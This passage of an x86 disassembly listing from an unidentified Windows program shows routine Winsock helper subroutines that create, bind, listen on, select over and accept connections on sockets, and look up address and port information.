mov eax, [ebp+var_18]
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_4042F6
push [ebp+var_C]
call sub_4053B1
pop ecx
loc_4042F6: ; CODE XREF: sub_404279+72�j
mov eax, [ebp+var_14]
locret_4042F9: ; CODE XREF: sub_404279+29�j
leave
retn
sub_404279 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4042FB proc near ; CODE XREF: sub_411D68+4�p
; sub_41349C+1FA�p ...
push ebp
mov ebp, esp
cmp dword_41E294, 0
jnz short loc_404327
call sub_404279
push eax
push offset dword_41E298
call sub_409C9D
pop ecx
pop ecx
push 1
push offset dword_41E294
call sub_409C9D
pop ecx
pop ecx
loc_404327: ; CODE XREF: sub_4042FB+A�j
mov eax, dword_41E298
pop ebp
retn
sub_4042FB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40432E proc near ; CODE XREF: sub_40435B+6�p
; sub_4046BC+5D�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push 0
push 1
push 17h
call ds:dword_417218 ; socket
mov [ebp+var_4], eax
cmp [ebp+var_4], 0FFFFFFFFh
jz short loc_404350
push [ebp+var_4]
call sub_4053B1
pop ecx
loc_404350: ; CODE XREF: sub_40432E+17�j
xor eax, eax
cmp [ebp+var_4], 0FFFFFFFFh
setnz al
leave
retn
sub_40432E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40435B proc near ; CODE XREF: sub_4083AD:loc_4085D6�p
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
call sub_40432E
test eax, eax
jnz short loc_40436E
xor eax, eax
jmp short locret_4043E7
; ---------------------------------------------------------------------------
loc_40436E: ; CODE XREF: sub_40435B+D�j
lea eax, [ebp+var_14]
push eax
call sub_404193
pop ecx
push 1
lea eax, [ebp+var_14]
push eax
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_404392
xor eax, eax
jmp short locret_4043E7
; ---------------------------------------------------------------------------
loc_404392: ; CODE XREF: sub_40435B+31�j
push 0BB8h
push 2
lea eax, [ebp+var_14]
push eax
push offset dword_418A5C
call sub_4050EA
add esp, 10h
mov [ebp+var_8], eax
push [ebp+var_C]
call sub_404CBB
pop ecx
cmp [ebp+var_8], 0
jz short loc_4043CB
cmp [ebp+var_8], 0FFFFFFFFh
jz short loc_4043CB
mov [ebp+var_18], 1
jmp short loc_4043CF
; ---------------------------------------------------------------------------
loc_4043CB: ; CODE XREF: sub_40435B+5F�j
; sub_40435B+65�j
and [ebp+var_18], 0
loc_4043CF: ; CODE XREF: sub_40435B+6E�j
mov eax, [ebp+var_18]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_4043E4
push [ebp+var_8]
call sub_4053B1
pop ecx
loc_4043E4: ; CODE XREF: sub_40435B+7E�j
mov eax, [ebp+var_4]
locret_4043E7: ; CODE XREF: sub_40435B+11�j
; sub_40435B+35�j
leave
retn
sub_40435B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4043E9 proc near ; CODE XREF: sub_408B30:loc_408C9F�p
; sub_40CA29+231�p ...
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 20h
push offset dword_418A1C
lea eax, [ebp+var_1C]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_1C]
push eax
call sub_4105FB
pop ecx
push 7D0h
push 2
push offset a80 ; "80"
lea eax, [ebp+var_1C]
push eax
call sub_4050EA
add esp, 10h
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_404439
cmp [ebp+var_8], 0FFFFFFFFh
jz short loc_404439
mov [ebp+var_20], 1
jmp short loc_40443D
; ---------------------------------------------------------------------------
loc_404439: ; CODE XREF: sub_4043E9+3F�j
; sub_4043E9+45�j
and [ebp+var_20], 0
loc_40443D: ; CODE XREF: sub_4043E9+4E�j
mov eax, [ebp+var_20]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_404452
push [ebp+var_8]
call sub_4053B1
pop ecx
loc_404452: ; CODE XREF: sub_4043E9+5E�j
mov eax, [ebp+var_4]
leave
retn
sub_4043E9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404457 proc near ; CODE XREF: sub_404FE7+AF�p
; sub_4050EA+ED�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
xor eax, eax
cmp [ebp+arg_4], 0
setz al
mov [ebp+var_4], eax
lea eax, [ebp+var_4]
push eax
push 8004667Eh
push [ebp+arg_0]
call ds:dword_417214 ; ioctlsocket
leave
retn
sub_404457 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40447B proc near ; CODE XREF: sub_40732D+22E�p
; sub_40732D+296�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+var_4]
push eax
push 4004667Fh
push [ebp+arg_0]
call ds:dword_417214 ; ioctlsocket
xor eax, eax
cmp [ebp+var_4], 0
setnz al
leave
retn
sub_40447B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40449C proc near ; CODE XREF: sub_40D871+5A1�p
; sub_411DC5+65�p
var_84 = dword ptr -84h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 84h
mov [ebp+var_84], 80h
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_80]
push eax
push [ebp+arg_0]
call ds:dword_417240 ; getsockname
cmp eax, 0FFFFFFFFh
jnz short loc_4044CC
xor eax, eax
jmp short locret_4044F5
; ---------------------------------------------------------------------------
loc_4044CC: ; CODE XREF: sub_40449C+2A�j
push 2
push 0
push 0
push 100h
push [ebp+arg_4]
push [ebp+var_84]
lea eax, [ebp+var_80]
push eax
call dword_41DE88 ; getnameinfo
test eax, eax
jz short loc_4044F2
xor eax, eax
jmp short locret_4044F5
; ---------------------------------------------------------------------------
loc_4044F2: ; CODE XREF: sub_40449C+50�j
push 1
pop eax
locret_4044F5: ; CODE XREF: sub_40449C+2E�j
; sub_40449C+54�j
leave
retn
sub_40449C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4044F7 proc near ; CODE XREF: sub_40732D+DD�p
; sub_4129CA+29�p ...
var_84 = dword ptr -84h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 84h
mov [ebp+var_84], 80h
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_80]
push eax
push [ebp+arg_0]
call ds:dword_417210 ; getpeername
cmp eax, 0FFFFFFFFh
jnz short loc_404527
xor eax, eax
jmp short locret_404550
; ---------------------------------------------------------------------------
loc_404527: ; CODE XREF: sub_4044F7+2A�j
push 2
push 0
push 0
push 100h
push [ebp+arg_4]
push [ebp+var_84]
lea eax, [ebp+var_80]
push eax
call dword_41DE88 ; getnameinfo
test eax, eax
jz short loc_40454D
xor eax, eax
jmp short locret_404550
; ---------------------------------------------------------------------------
loc_40454D: ; CODE XREF: sub_4044F7+50�j
push 1
pop eax
locret_404550: ; CODE XREF: sub_4044F7+2E�j
; sub_4044F7+54�j
leave
retn
sub_4044F7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404552 proc near ; CODE XREF: sub_41331E+A6�p
; sub_415F69+256�p
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 88h
mov [ebp+var_88], 80h
lea eax, [ebp+var_88]
push eax
lea eax, [ebp+var_80]
push eax
push [ebp+arg_0]
call ds:dword_417240 ; getsockname
cmp eax, 0FFFFFFFFh
jnz short loc_404582
xor eax, eax
jmp short locret_4045B0
; ---------------------------------------------------------------------------
loc_404582: ; CODE XREF: sub_404552+2A�j
lea eax, [ebp+var_80]
mov [ebp+var_84], eax
push 0Ah
push [ebp+arg_4]
mov eax, [ebp+var_84]
mov ax, [eax+2]
push eax
call ds:dword_417238 ; htons
movzx eax, ax
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
push 1
pop eax
locret_4045B0: ; CODE XREF: sub_404552+2E�j
leave
retn
sub_404552 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4045B2 proc near ; CODE XREF: sub_4143B0+191�p
; sub_415F69+20A�p
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 88h
mov [ebp+var_88], 80h
lea eax, [ebp+var_88]
push eax
lea eax, [ebp+var_80]
push eax
push [ebp+arg_0]
call ds:dword_417210 ; getpeername
cmp eax, 0FFFFFFFFh
jnz short loc_4045E2
xor eax, eax
jmp short locret_404610
; ---------------------------------------------------------------------------
loc_4045E2: ; CODE XREF: sub_4045B2+2A�j
lea eax, [ebp+var_80]
mov [ebp+var_84], eax
push 0Ah
push [ebp+arg_4]
mov eax, [ebp+var_84]
mov ax, [eax+2]
push eax
call ds:dword_417238 ; htons
movzx eax, ax
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
push 1
pop eax
locret_404610: ; CODE XREF: sub_4045B2+2E�j
leave
retn
sub_4045B2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404612 proc near ; CODE XREF: sub_40D871+69C�p
var_40C = dword ptr -40Ch
var_408 = dword ptr -408h
var_404 = byte ptr -404h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 40Ch
lea eax, [ebp+var_408]
push eax
push 0
push 0
push [ebp+arg_0]
call dword_41DE84 ; getaddrinfo
test eax, eax
jnz loc_4046B8
mov eax, [ebp+var_408]
mov [ebp+var_40C], eax
loc_404643: ; CODE XREF: sub_404612+98�j
cmp [ebp+var_40C], 0
jz short loc_4046AC
push 2
push 0
push 0
push 401h
lea eax, [ebp+var_404]
push eax
mov eax, [ebp+var_40C]
push dword ptr [eax+10h]
mov eax, [ebp+var_40C]
push dword ptr [eax+18h]
call dword_41DE88 ; getnameinfo
test eax, eax
jnz short loc_40469B
mov eax, [ebp+var_40C]
cmp dword ptr [eax+4], 2
jnz short loc_40469B
lea eax, [ebp+var_404]
push eax
push [ebp+arg_4]
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
mov al, 1
jmp short locret_4046BA
; ---------------------------------------------------------------------------
loc_40469B: ; CODE XREF: sub_404612+66�j
; sub_404612+72�j
mov eax, [ebp+var_40C]
mov eax, [eax+1Ch]
mov [ebp+var_40C], eax
jmp short loc_404643
; ---------------------------------------------------------------------------
loc_4046AC: ; CODE XREF: sub_404612+38�j
push [ebp+var_408]
call dword_41DE8C ; freeaddrinfo
loc_4046B8: ; CODE XREF: sub_404612+1F�j
xor al, al
locret_4046BA: ; CODE XREF: sub_404612+87�j
leave
retn
sub_404612 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4046BC proc near ; CODE XREF: sub_4020C2+124�p
; sub_403DF3+36�p ...
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 3Ch
xor eax, eax
test eax, eax
jz short loc_4046D1
mov [ebp+var_3C], 2
jmp short loc_4046D8
; ---------------------------------------------------------------------------
loc_4046D1: ; CODE XREF: sub_4046BC+A�j
mov [ebp+var_3C], 1
loc_4046D8: ; CODE XREF: sub_4046BC+13�j
mov eax, [ebp+var_3C]
mov [ebp+var_8], eax
push 1008h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_2C], eax
cmp [ebp+var_2C], 0
jnz short loc_4046F9
xor eax, eax
jmp locret_40486F
; ---------------------------------------------------------------------------
loc_4046F9: ; CODE XREF: sub_4046BC+34�j
mov eax, [ebp+var_2C]
and dword ptr [eax], 0
mov eax, [ebp+var_2C]
and dword ptr [eax+804h], 0
push 20h
push 0
lea eax, [ebp+var_28]
push eax
call sub_416B6A ; memset
add esp, 0Ch
call sub_40432E
neg eax
sbb eax, eax
and al, 0FEh
inc eax
inc eax
mov [ebp+var_24], eax
mov eax, [ebp+var_8]
mov [ebp+var_20], eax
mov [ebp+var_28], 5
lea eax, [ebp+var_30]
push eax
lea eax, [ebp+var_28]
push eax
push [ebp+arg_0]
push 0
call dword_41DE84 ; getaddrinfo
test eax, eax
jz short loc_40475D
push [ebp+var_2C]
call sub_416B4C ; free
pop ecx
xor eax, eax
jmp locret_40486F
; ---------------------------------------------------------------------------
loc_40475D: ; CODE XREF: sub_4046BC+8F�j
mov eax, [ebp+var_30]
mov [ebp+var_4], eax
jmp short loc_40476E
; ---------------------------------------------------------------------------
loc_404765: ; CODE XREF: sub_4046BC+DD�j
; sub_4046BC+F1�j ...
mov eax, [ebp+var_4]
mov eax, [eax+1Ch]
mov [ebp+var_4], eax
loc_40476E: ; CODE XREF: sub_4046BC+A7�j
cmp [ebp+var_4], 0
jz loc_40484E
mov eax, [ebp+var_4]
push dword ptr [eax+0Ch]
mov eax, [ebp+var_4]
push dword ptr [eax+8]
mov eax, [ebp+var_4]
push dword ptr [eax+4]
call ds:dword_417218 ; socket
mov [ebp+var_34], eax
cmp [ebp+var_34], 0FFFFFFFFh
jnz short loc_40479B
jmp short loc_404765
; ---------------------------------------------------------------------------
loc_40479B: ; CODE XREF: sub_4046BC+DB�j
mov eax, [ebp+var_4]
cmp dword ptr [eax+4], 2
jz short loc_4047AF
mov eax, [ebp+var_4]
cmp dword ptr [eax+4], 17h
jz short loc_4047AF
jmp short loc_404765
; ---------------------------------------------------------------------------
loc_4047AF: ; CODE XREF: sub_4046BC+E6�j
; sub_4046BC+EF�j
mov eax, [ebp+arg_4]
and eax, 2
test eax, eax
jz short loc_4047D6
mov [ebp+var_38], 1
push 4
lea eax, [ebp+var_38]
push eax
push 4
push 0FFFFh
push [ebp+var_34]
call ds:dword_417204 ; setsockopt
loc_4047D6: ; CODE XREF: sub_4046BC+FB�j
mov eax, [ebp+var_4]
push dword ptr [eax+10h]
mov eax, [ebp+var_4]
push dword ptr [eax+18h]
push [ebp+var_34]
call ds:dword_417208 ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_4047FE
push [ebp+var_34]
call sub_4053B1
pop ecx
jmp loc_404765
; ---------------------------------------------------------------------------
loc_4047FE: ; CODE XREF: sub_4046BC+132�j
cmp [ebp+var_8], 1
jnz short loc_404822
push 32h
push [ebp+var_34]
call ds:dword_417268 ; listen
cmp eax, 0FFFFFFFFh
jnz short loc_404822
push [ebp+var_34]
call sub_4053B1
pop ecx
jmp loc_404765
; ---------------------------------------------------------------------------
loc_404822: ; CODE XREF: sub_4046BC+146�j
; sub_4046BC+156�j
mov eax, [ebp+var_2C]
mov eax, [eax]
mov ecx, [ebp+var_2C]
mov edx, [ebp+var_34]
mov [ecx+eax*4+4], edx
mov eax, [ebp+var_2C]
mov eax, [eax]
inc eax
mov ecx, [ebp+var_2C]
mov [ecx], eax
mov eax, [ebp+var_2C]
cmp dword ptr [eax], 200h
jnz short loc_404849
jmp short loc_40484E
; ---------------------------------------------------------------------------
loc_404849: ; CODE XREF: sub_4046BC+189�j
jmp loc_404765
; ---------------------------------------------------------------------------
loc_40484E: ; CODE XREF: sub_4046BC+B6�j
; sub_4046BC+18B�j
push [ebp+var_30]
call dword_41DE8C ; freeaddrinfo
mov eax, [ebp+var_2C]
cmp dword ptr [eax], 0
jnz short loc_40486C
push [ebp+var_2C]
call sub_416B4C ; free
pop ecx
xor eax, eax
jmp short locret_40486F
; ---------------------------------------------------------------------------
loc_40486C: ; CODE XREF: sub_4046BC+1A1�j
mov eax, [ebp+var_2C]
locret_40486F: ; CODE XREF: sub_4046BC+38�j
; sub_4046BC+9C�j ...
leave
retn
sub_4046BC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404871 proc near ; CODE XREF: sub_411BBC+B0�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push [ebp+arg_8]
push [ebp+arg_4]
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40488F
xor eax, eax
jmp short locret_4048ED
; ---------------------------------------------------------------------------
loc_40488F: ; CODE XREF: sub_404871+18�j
mov eax, [ebp+var_4]
mov eax, [eax]
mov ecx, [ebp+arg_0]
add eax, [ecx]
cmp eax, 200h
jbe short loc_4048AD
push [ebp+var_4]
call sub_404CBB
pop ecx
xor eax, eax
jmp short locret_4048ED
; ---------------------------------------------------------------------------
loc_4048AD: ; CODE XREF: sub_404871+2D�j
mov eax, [ebp+var_4]
mov eax, [eax]
shl eax, 2
push eax
mov eax, [ebp+var_4]
add eax, 4
push eax
mov eax, [ebp+arg_0]
mov eax, [eax]
mov ecx, [ebp+arg_0]
lea eax, [ecx+eax*4+4]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+arg_0]
mov eax, [eax]
mov ecx, [ebp+var_4]
add eax, [ecx]
mov ecx, [ebp+arg_0]
mov [ecx], eax
push [ebp+var_4]
call sub_416B4C ; free
pop ecx
push 1
pop eax
locret_4048ED: ; CODE XREF: sub_404871+1C�j
; sub_404871+3A�j
leave
retn
sub_404871 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4048EF proc near ; CODE XREF: sub_4020C2+22E�p
; sub_403DF3+8D�p ...
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = byte ptr -84h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0A8h
push esi
mov [ebp+var_4], 80h
and [ebp+var_8C], 0
jmp short loc_404916
; ---------------------------------------------------------------------------
loc_404909: ; CODE XREF: sub_4048EF+133�j
; sub_4048EF:loc_404A32�j
mov eax, [ebp+var_8C]
inc eax
mov [ebp+var_8C], eax
loc_404916: ; CODE XREF: sub_4048EF+18�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8C]
cmp ecx, [eax]
jnb loc_404A37
mov eax, [ebp+arg_0]
add eax, 804h
push eax
mov eax, [ebp+var_8C]
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4+4]
call sub_416E30 ; __WSAFDIsSet
test eax, eax
jz loc_404A32
loc_40494A: ; CODE XREF: sub_4048EF+100�j
and [ebp+var_9C], 0
jmp short loc_404960
; ---------------------------------------------------------------------------
loc_404953: ; CODE XREF: sub_4048EF:loc_4049E6�j
mov eax, [ebp+var_9C]
inc eax
mov [ebp+var_9C], eax
loc_404960: ; CODE XREF: sub_4048EF+62�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_9C]
cmp ecx, [eax+804h]
jnb short loc_4049EB
mov eax, [ebp+var_9C]
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8C]
mov esi, [ebp+arg_0]
mov eax, [ecx+eax*4+808h]
cmp eax, [esi+edx*4+4]
jnz short loc_4049E6
loc_404990: ; CODE XREF: sub_4048EF+E0�j
mov eax, [ebp+arg_0]
mov eax, [eax+804h]
dec eax
cmp [ebp+var_9C], eax
jnb short loc_4049D1
mov eax, [ebp+var_9C]
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_9C]
mov esi, [ebp+arg_0]
mov edx, [esi+edx*4+80Ch]
mov [ecx+eax*4+808h], edx
mov eax, [ebp+var_9C]
inc eax
mov [ebp+var_9C], eax
jmp short loc_404990
; ---------------------------------------------------------------------------
loc_4049D1: ; CODE XREF: sub_4048EF+B1�j
mov eax, [ebp+arg_0]
mov eax, [eax+804h]
dec eax
mov ecx, [ebp+arg_0]
mov [ecx+804h], eax
jmp short loc_4049EB
; ---------------------------------------------------------------------------
loc_4049E6: ; CODE XREF: sub_4048EF+9F�j
jmp loc_404953
; ---------------------------------------------------------------------------
loc_4049EB: ; CODE XREF: sub_4048EF+80�j
; sub_4048EF+F5�j
xor eax, eax
test eax, eax
jnz loc_40494A
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_84]
push eax
mov eax, [ebp+var_8C]
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4+4]
call ds:dword_4171FC ; accept
mov [ebp+var_98], eax
cmp [ebp+var_98], 0FFFFFFFFh
jnz short loc_404A27
jmp loc_404909
; ---------------------------------------------------------------------------
loc_404A27: ; CODE XREF: sub_4048EF+131�j
mov eax, [ebp+var_98]
jmp loc_404CB8
; ---------------------------------------------------------------------------
loc_404A32: ; CODE XREF: sub_4048EF+55�j
jmp loc_404909
; ---------------------------------------------------------------------------
loc_404A37: ; CODE XREF: sub_4048EF+32�j
mov eax, [ebp+arg_0]
and dword ptr [eax+804h], 0
and [ebp+var_8C], 0
jmp short loc_404A57
; ---------------------------------------------------------------------------
loc_404A4A: ; CODE XREF: sub_4048EF+21D�j
mov eax, [ebp+var_8C]
inc eax
mov [ebp+var_8C], eax
loc_404A57: ; CODE XREF: sub_4048EF+159�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8C]
cmp ecx, [eax]
jnb loc_404B11
loc_404A68: ; CODE XREF: sub_4048EF+217�j
and [ebp+var_A0], 0
jmp short loc_404A7E
; ---------------------------------------------------------------------------
loc_404A71: ; CODE XREF: sub_4048EF:loc_404AB0�j
mov eax, [ebp+var_A0]
inc eax
mov [ebp+var_A0], eax
loc_404A7E: ; CODE XREF: sub_4048EF+180�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_A0]
cmp ecx, [eax+804h]
jnb short loc_404AB2
mov eax, [ebp+var_A0]
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8C]
mov esi, [ebp+arg_0]
mov eax, [ecx+eax*4+808h]
cmp eax, [esi+edx*4+4]
jnz short loc_404AB0
jmp short loc_404AB2
; ---------------------------------------------------------------------------
loc_404AB0: ; CODE XREF: sub_4048EF+1BD�j
jmp short loc_404A71
; ---------------------------------------------------------------------------
loc_404AB2: ; CODE XREF: sub_4048EF+19E�j
; sub_4048EF+1BF�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_A0]
cmp ecx, [eax+804h]
jnz short loc_404B02
mov eax, [ebp+arg_0]
cmp dword ptr [eax+804h], 200h
jnb short loc_404B02
mov eax, [ebp+var_A0]
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8C]
mov esi, [ebp+arg_0]
mov edx, [esi+edx*4+4]
mov [ecx+eax*4+808h], edx
mov eax, [ebp+arg_0]
mov eax, [eax+804h]
inc eax
mov ecx, [ebp+arg_0]
mov [ecx+804h], eax
loc_404B02: ; CODE XREF: sub_4048EF+1D2�j
; sub_4048EF+1E1�j
xor eax, eax
test eax, eax
jnz loc_404A68
jmp loc_404A4A
; ---------------------------------------------------------------------------
loc_404B11: ; CODE XREF: sub_4048EF+173�j
mov eax, [ebp+arg_4]
xor edx, edx
mov ecx, 3E8h
div ecx
mov [ebp+var_94], eax
mov eax, [ebp+arg_4]
xor edx, edx
mov ecx, 3E8h
div ecx
imul edx, 3E8h
mov [ebp+var_90], edx
lea eax, [ebp+var_94]
push eax
push 0
push 0
mov eax, [ebp+arg_0]
add eax, 804h
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax]
call ds:dword_41722C ; select
mov [ebp+var_88], eax
cmp [ebp+var_88], 0
jnz short loc_404B71
or eax, 0FFFFFFFFh
jmp loc_404CB8
; ---------------------------------------------------------------------------
loc_404B71: ; CODE XREF: sub_4048EF+278�j
cmp [ebp+var_88], 0FFFFFFFFh
jnz short loc_404B81
xor eax, eax
jmp loc_404CB8
; ---------------------------------------------------------------------------
loc_404B81: ; CODE XREF: sub_4048EF+289�j
and [ebp+var_8C], 0
jmp short loc_404B97
; ---------------------------------------------------------------------------
loc_404B8A: ; CODE XREF: sub_4048EF+3B4�j
; sub_4048EF:loc_404CB0�j
mov eax, [ebp+var_8C]
inc eax
mov [ebp+var_8C], eax
loc_404B97: ; CODE XREF: sub_4048EF+299�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8C]
cmp ecx, [eax]
jnb loc_404CB5
mov eax, [ebp+arg_0]
add eax, 804h
push eax
mov eax, [ebp+var_8C]
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4+4]
call sub_416E30 ; __WSAFDIsSet
test eax, eax
jz loc_404CB0
loc_404BCB: ; CODE XREF: sub_4048EF+381�j
and [ebp+var_A8], 0
jmp short loc_404BE1
; ---------------------------------------------------------------------------
loc_404BD4: ; CODE XREF: sub_4048EF:loc_404C67�j
mov eax, [ebp+var_A8]
inc eax
mov [ebp+var_A8], eax
loc_404BE1: ; CODE XREF: sub_4048EF+2E3�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_A8]
cmp ecx, [eax+804h]
jnb short loc_404C6C
mov eax, [ebp+var_A8]
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8C]
mov esi, [ebp+arg_0]
mov eax, [ecx+eax*4+808h]
cmp eax, [esi+edx*4+4]
jnz short loc_404C67
loc_404C11: ; CODE XREF: sub_4048EF+361�j
mov eax, [ebp+arg_0]
mov eax, [eax+804h]
dec eax
cmp [ebp+var_A8], eax
jnb short loc_404C52
mov eax, [ebp+var_A8]
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_A8]
mov esi, [ebp+arg_0]
mov edx, [esi+edx*4+80Ch]
mov [ecx+eax*4+808h], edx
mov eax, [ebp+var_A8]
inc eax
mov [ebp+var_A8], eax
jmp short loc_404C11
; ---------------------------------------------------------------------------
loc_404C52: ; CODE XREF: sub_4048EF+332�j
mov eax, [ebp+arg_0]
mov eax, [eax+804h]
dec eax
mov ecx, [ebp+arg_0]
mov [ecx+804h], eax
jmp short loc_404C6C
; ---------------------------------------------------------------------------
loc_404C67: ; CODE XREF: sub_4048EF+320�j
jmp loc_404BD4
; ---------------------------------------------------------------------------
loc_404C6C: ; CODE XREF: sub_4048EF+301�j
; sub_4048EF+376�j
xor eax, eax
test eax, eax
jnz loc_404BCB
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_84]
push eax
mov eax, [ebp+var_8C]
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4+4]
call ds:dword_4171FC ; accept
mov [ebp+var_A4], eax
cmp [ebp+var_A4], 0FFFFFFFFh
jnz short loc_404CA8
jmp loc_404B8A
; ---------------------------------------------------------------------------
loc_404CA8: ; CODE XREF: sub_4048EF+3B2�j
mov eax, [ebp+var_A4]
jmp short loc_404CB8
; ---------------------------------------------------------------------------
loc_404CB0: ; CODE XREF: sub_4048EF+2D6�j
jmp loc_404B8A
; ---------------------------------------------------------------------------
loc_404CB5: ; CODE XREF: sub_4048EF+2B3�j
or eax, 0FFFFFFFFh
loc_404CB8: ; CODE XREF: sub_4048EF+13E�j
; sub_4048EF+27D�j ...
pop esi
leave
retn
sub_4048EF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404CBB proc near ; CODE XREF: sub_4020C2+175�p
; sub_4020C2+25F�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_404CCC
; ---------------------------------------------------------------------------
loc_404CC5: ; CODE XREF: sub_404CBB+3E�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_404CCC: ; CODE XREF: sub_404CBB+8�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_4]
cmp ecx, [eax]
jnb short loc_404CFB
cmp dword_41DE38, 0
jz short loc_404CE9
mov eax, [ebp+arg_0]
cmp dword ptr [eax], 64h
jbe short loc_404CE9
jmp short loc_404CFB
; ---------------------------------------------------------------------------
loc_404CE9: ; CODE XREF: sub_404CBB+22�j
; sub_404CBB+2A�j
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4+4]
call sub_4053B1
pop ecx
jmp short loc_404CC5
; ---------------------------------------------------------------------------
loc_404CFB: ; CODE XREF: sub_404CBB+19�j
; sub_404CBB+2C�j
mov eax, [ebp+arg_0]
and dword ptr [eax+804h], 0
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
leave
retn
sub_404CBB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404D10 proc near ; CODE XREF: sub_41349C+1B7�p
; sub_4143B0+3A�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_0], 200h
jbe short loc_404D21
xor eax, eax
jmp short locret_404D4B
; ---------------------------------------------------------------------------
loc_404D21: ; CODE XREF: sub_404D10+B�j
push 1010h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_404D39
xor eax, eax
